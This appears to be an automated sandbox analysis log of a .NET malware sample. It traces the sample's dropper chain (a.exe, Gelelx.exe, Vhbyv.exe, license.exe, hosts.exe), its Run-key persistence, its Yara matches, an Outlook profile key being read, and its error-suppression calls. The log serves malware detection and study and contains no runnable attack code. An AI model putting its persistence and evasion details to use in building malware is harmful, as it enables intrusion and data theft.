Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe  Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe  Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe  Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe  Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe  Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe  Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe  Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe  Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe  Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe  Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe  Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe  Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe  Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\license.exe  Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\license.exe  Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\license.exe  Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\license.exe  Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\license.exe  Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\license.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\license.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\license.exe  Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\license.exe  Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\license.exe  Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\license.exe  Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\license.exe  Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\license.exe  Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\license.exe  Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\license.exe  Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\license.exe  Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\license.exe  Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe  Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe  Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe  Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe  Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe  Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe  Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe  Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe  Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe  Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe  Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe  Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe  Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe  Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe  Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe  Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe  Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe  Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe  Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe  Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe  Section loaded: atiadlxx.dll
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe  Section loaded: atiadlxy.dll
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe  Section loaded: atiadlxy.dll
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe  Section loaded: atiadlxy.dll
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe  Section loaded: nvapi64.dll
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe  Section loaded: atiadlxy.dll
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe  Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\license.exe  Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\license.exe  Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\license.exe  Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\license.exe  Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\license.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\license.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\license.exe  Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\license.exe  Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\license.exe  Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\license.exe  Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\license.exe  Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\license.exe  Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\license.exe  Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\license.exe  Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\license.exe  Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\license.exe  Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\hosts.exe  Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\hosts.exe  Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\hosts.exe  Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\hosts.exe  Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\hosts.exe  Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\hosts.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\hosts.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\hosts.exe  Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\hosts.exe  Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\hosts.exe  Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\hosts.exe  Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\hosts.exe  Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\hosts.exe  Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\hosts.exe  Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\hosts.exe  Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: Window Recorder  Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe  File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\AppData\Roaming\a.exe  Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: SecuriteInfo.com.FileRepMalware.23820.12149.exe  Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: SecuriteInfo.com.FileRepMalware.23820.12149.exe  Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: SecuriteInfo.com.FileRepMalware.23820.12149.exe  Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Users\Administrator\Desktop\2023CryptsDone\WinFormProject-master\obj\Debug\Aml.pdb  source: SecuriteInfo.com.FileRepMalware.23820.12149.exe, 00000000.00000000.1141870986.0000000000F52000.00000002.00000001.01000000.00000003.sdmp, a.exe, 0000000B.00000002.1787672422.00000000035FA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq  source: a.exe, 0000000B.00000002.1830473060.0000000005940000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: chrome_elf.dll.pdb  source: chrome.exe, 0000000D.00000000.1383267169.00007FFC9D18F000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: protobuf-net.pdb  source: a.exe, 0000000B.00000002.1830473060.0000000005940000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation

Source: Yara match  File source: 11.2.a.exe.5910000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 16.2.Gelelx.exe.59f0000.2.unpack, type: UNPACKEDPE
Source: Yara match  File source: 16.2.Gelelx.exe.59f0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 21.2.license.exe.4435630.2.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 21.2.license.exe.41706c8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 21.2.license.exe.4435630.2.unpack, type: UNPACKEDPE
Source: Yara match  File source: 00000010.00000002.2093956050.00000000059F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000010.00000002.1993362818.00000000033C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 0000000B.00000002.1787672422.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 0000000B.00000002.1825728911.0000000005910000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000015.00000002.2435942015.0000000004435000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000015.00000002.2348269158.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000015.00000002.2435942015.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: Process Memory Space: a.exe PID: 7908, type: MEMORYSTR
Source: SecuriteInfo.com.FileRepMalware.23820.12149.exe  Static PE information: 0xC865B9A0 [Thu Jul 16 07:24:16 2076 UTC]
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe  Code function: 0_2_031CEF00 pushfd ; iretd 0_2_031CEF01
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Code function: 1_2_085A3AD9 push ebx; retf 1_2_085A3ADA
Source: C:\Users\user\AppData\Roaming\a.exe  Code function: 11_2_03164861 push edi; iretd 11_2_03164866
Source: C:\Users\user\AppData\Roaming\a.exe  Code function: 11_2_05722E78 push AC0130BBh; ret 11_2_05722E8D
Source: C:\Users\user\AppData\Roaming\a.exe  Code function: 11_2_058FD053 push edi; iretd 11_2_058FD056
Source: C:\Users\user\AppData\Roaming\a.exe  Code function: 11_2_05CB0719 push es; retf 11_2_05CB0722
Source: C:\Users\user\AppData\Roaming\a.exe  Code function: 11_2_05CB06AA push es; retf 11_2_05CB06CA
Source: C:\Users\user\AppData\Roaming\a.exe  Code function: 11_2_05CB8870 push es; iretd 11_2_05CB887E
Source: C:\Users\user\AppData\Roaming\a.exe  Code function: 11_2_05CB8830 push es; iretd 11_2_05CB883E
Source: C:\Users\user\AppData\Roaming\a.exe  Code function: 11_2_05CB9588 push ebp; iretd 11_2_05CB9592
Source: C:\Users\user\AppData\Roaming\a.exe  Code function: 11_2_05CB9E87 push edi; iretd 11_2_05CB9E92
Source: C:\Users\user\AppData\Roaming\a.exe  Code function: 11_2_05CB1E73 pushad ; retf 11_2_05CB1E81
Source: C:\Users\user\AppData\Roaming\a.exe  Code function: 11_2_05CE354D push ss; retf 11_2_05CE3559
Source: C:\Users\user\AppData\Roaming\a.exe  Code function: 11_2_05CE653C push ds; iretd 11_2_05CE653F
Source: C:\Users\user\AppData\Roaming\a.exe  Code function: 11_2_05CE68FA pushad ; retf 11_2_05CE68FD
Source: C:\Users\user\AppData\Roaming\a.exe  Code function: 11_2_05CE70FA pushad ; ret 11_2_05CE70FD
Source: C:\Users\user\AppData\Roaming\a.exe  Code function: 11_2_05CE123E push BEFFFFEEh; ret 11_2_05CE1243
Source: C:\Users\user\AppData\Roaming\a.exe  Code function: 11_2_06190040 push es; retn 1939h 11_2_06196460
Source: C:\Users\user\AppData\Roaming\a.exe  Code function: 11_2_061934FA pushad ; retf 11_2_061934FD
Source: C:\Users\user\AppData\Roaming\a.exe  Code function: 11_2_07318A20 push eax; ret 11_2_07318A21
Source: C:\Users\user\AppData\Roaming\a.exe  Code function: 11_2_073D0331 push ds; iretd 11_2_073D033F
Source: C:\Users\user\AppData\Roaming\a.exe  Code function: 11_2_073D68F7 push edi; retf 11_2_073D6906
Source: C:\Users\user\AppData\Roaming\a.exe  Code function: 11_2_07510701 push 8B0442FEh; iretd 11_2_07510706
Source: C:\Users\user\AppData\Roaming\a.exe  Code function: 11_2_07510FF3 push 8B0442FEh; iretd 11_2_07510FF8
Source: C:\Users\user\AppData\Roaming\a.exe  Code function: 11_2_075105D3 push 8B0442FEh; iretd 11_2_075105D8
Source: C:\Users\user\AppData\Roaming\a.exe  Code function: 11_2_07510AAE push 8B0442FEh; iretd 11_2_07510AB3
Source: C:\Users\user\AppData\Roaming\a.exe  Code function: 11_2_07511123 push 8B0442FEh; iretd 11_2_07511128
Source: C:\Users\user\AppData\Roaming\a.exe  Code function: 11_2_07510983 push 8B0442FEh; iretd 11_2_07510988
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  Code function: 16_2_03331322 push esp; iretd 16_2_03331329
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  Code function: 16_2_0333132A pushad ; ret 16_2_0333132D
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  Code function: 16_2_03339573 push eax; retf 16_2_0333957D
Source: a.exe.0.dr  Static PE information: section name: .text entropy: 7.996440956524935
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe  File created: C:\Users\user\AppData\Roaming\hosts.exe
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  File created: C:\Users\user\AppData\Roaming\license.exe
Source: C:\Users\user\AppData\Roaming\a.exe  File created: C:\Users\user\AppData\Local\Temp\Gelelx.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe  File created: C:\Users\user\AppData\Roaming\a.exe
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  File created: C:\Users\user\AppData\Local\Temp\Vhbyv.exe

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe  Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run hosts
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run license
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run license
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run license
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe  Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run hosts
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe  Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run hosts

Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe | Process information set: NOOPENFILEERRORBOX (SetErrorMode with SEM_NOOPENFILEERRORBOX, which suppresses the system dialog shown when a file cannot be found, so a failed load of a dropped component does not alert the user; the same call is recorded repeatedly for this process)
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (recorded repeatedly for this process)
                      Source: C:\Users\user\AppData\Roaming\a.exe | Process information set: NOOPENFILEERRORBOX (recorded repeatedly for this process)
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe Process information set: NOOPENFILEERRORBOX (repeated 33 times)
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe Process information set: NOOPENFILEERRORBOX (repeated 32 times)
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe Process information set: NOOPENFILEERRORBOX (repeated 35 times)
                      Source: C:\Users\user\AppData\Roaming\license.exe Process information set: NOOPENFILEERRORBOX (repeated 30 times)
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe Process information set: NOOPENFILEERRORBOX (repeated 57 times)
                      Source: C:\Users\user\AppData\Roaming\license.exe Process information set: NOOPENFILEERRORBOX (repeated 29 times)
                      Source: C:\Users\user\AppData\Roaming\hosts.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\hosts.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\hosts.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\hosts.exeProcess information set: NOOPENFILEERRORBOX
